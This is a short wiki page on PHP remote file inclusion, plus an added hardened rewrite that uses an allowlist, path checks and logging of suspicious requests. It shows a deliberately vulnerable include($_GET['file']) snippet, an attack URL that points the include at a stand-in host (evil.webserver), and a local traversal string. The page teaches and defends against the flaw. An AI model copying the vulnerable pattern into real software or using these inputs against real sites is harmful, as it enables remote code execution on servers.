File Inclusion/Remote File Inclusion
From NetSec
Latest revision as of 06:55, 19 July 2012
Remote file inclusion refers to the inclusion of a file that is not located on the victim's server. Because recent versions of PHP have built-in safeguards that prevent remote inclusion unless an administrator explicitly enables it, this form of vulnerability is now incredibly rare.
An example URI of a vulnerable site would be /include.php?file=howto.php
The PHP behind it may look like:
<html>
<head><title>Page Title</title></head>
<body>
<?php
// Deliberately vulnerable: the untrusted "file" parameter is passed straight to include().
include($_GET['file']);
?>
</body>
</html>
The above PHP code is vulnerable. Do not use this on your site!
An attacker that sees
/include.php?file=howto.php
may change the URL to
/include.php?file=http://evil.webserver/include.txt
In this example, if include.txt contains PHP code written by the attacker, that code will be executed on the server side.
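The following is an added example of how the vulnerable include.php above can be rewritten so that the request parameter is never used as a path at all; it is not code from the NetSec page. It assumes that the includable pages live in a pages/ directory next to the script and that the parameter is still called "file", so the page's own URL /include.php?file=howto.php keeps working while /include.php?file=http://evil.webserver/include.txt is refused and logged.

```php
<?php
// Added example (not from the NetSec page): hardened replacement for include($_GET['file']).
// Assumptions: includable pages live in $pagesDir (defined below); the parameter name "file"
// is kept from the original page.

declare(strict_types=1);

// Allowlist: the only ?file= values that are ever mapped to a filesystem path.
// The request value is used purely as a lookup key, never as part of a path.
const ALLOWED_PAGES = [
    'howto.php' => 'howto.php',
    'faq.php'   => 'faq.php',
];

/**
 * Resolve a user-supplied page key to an absolute path inside $pagesDir,
 * or return null if the key is not allowlisted or does not resolve inside $pagesDir.
 */
function resolvePage(string $pagesDir, ?string $key): ?string
{
    if ($key === null || !array_key_exists($key, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$key]);
    // Defence in depth: even an allowlisted entry must resolve to a real file below $pagesDir,
    // so a symlink or a mistaken allowlist entry cannot point outside the directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Detection helper: true if a raw ?file= value carries a URL scheme
 * (http://, ftp://, data:, php:// ...). The allowlist rejects such values
 * regardless; this only decides whether the rejection is worth an alert.
 */
function looksRemote(string $value): bool
{
    return (bool) preg_match('#^[a-z][a-z0-9+.\-]*:#i', $value);
}

$pagesDir  = __DIR__ . '/pages';                 // assumption: includable pages live here
$requested = $_GET['file'] ?? null;
$target    = resolvePage($pagesDir, is_string($requested) ? $requested : null);

if ($target === null) {
    if (is_string($requested) && looksRemote($requested)) {
        // Constructed log line; forward the web server's error log to your SIEM to catch these.
        error_log('possible remote file inclusion attempt: file=' . $requested);
    }
    http_response_code(404);
    echo 'Unknown page';
    exit;
}
?>
<html>
<head><title>Page Title</title></head>
<body>
<?php include $target; ?>
</body>
</html>
```

Two points about the design. First, the allowlist is the actual control: because the request value is only ever a key into ALLOWED_PAGES, neither a remote URL nor a local traversal string (../../etc/passwd) can reach include(). The realpath check is there as a second layer. Second, the server-side safeguard the page refers to is the php.ini setting allow_url_include, which defaults to Off; keep it Off (and allow_url_fopen Off unless something genuinely needs it), but do not rely on it alone, since the same unvalidated include() would still expose local file inclusion.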